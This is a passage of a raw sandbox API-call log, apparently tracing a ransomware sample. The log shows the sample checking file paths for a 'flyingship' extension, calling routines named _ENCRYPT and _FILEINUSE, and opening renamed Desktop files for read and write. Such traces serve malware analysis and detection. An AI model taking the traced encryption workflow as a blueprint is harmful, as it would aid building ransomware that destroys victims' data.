dwCmpFlags=0x1, lpString1="wnBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TD\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BhG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hG Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xz5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NyPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yPYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PYF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YF_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_.flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.049] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flyingship.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 2 [0158.049] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.049] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.049] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.049] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.049] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.049] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.050] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.050] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.050] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.050] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bqtv.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.051] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.051] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.051] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.051] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.051] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.051] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.051] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.051] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.051] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.051] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.051] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.051] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.052] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.052] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.052] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc98fd480, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc98fd480, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9949740, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x44d0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="bqTv.flyingship.png", cAlternateFileName="BQTVFL~1.PNG")) returned 0x90add8 [0158.052] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.052] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc98fd480, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc98fd480, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9949740, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x44d0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="bqTv.flyingship.png", cAlternateFileName="BQTVFL~1.PNG")) returned 0x90add8 [0158.052] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.052] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bwOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wOHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBTD\\bqTv.flyingship.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.054] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.054] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.054] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.054] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.054] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.055] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.055] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.055] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.055] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.055] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\du_aud-fz3ji9.flyingship.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.057] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.057] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.058] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.058] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.058] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.058] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.058] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.058] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.058] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.058] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.059] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.059] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.059] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.059] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.059] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.060] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.060] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.060] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.060] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.060] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.060] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.060] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.060] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.063] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.063] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.063] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.063] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.063] PeekMessageW (in: 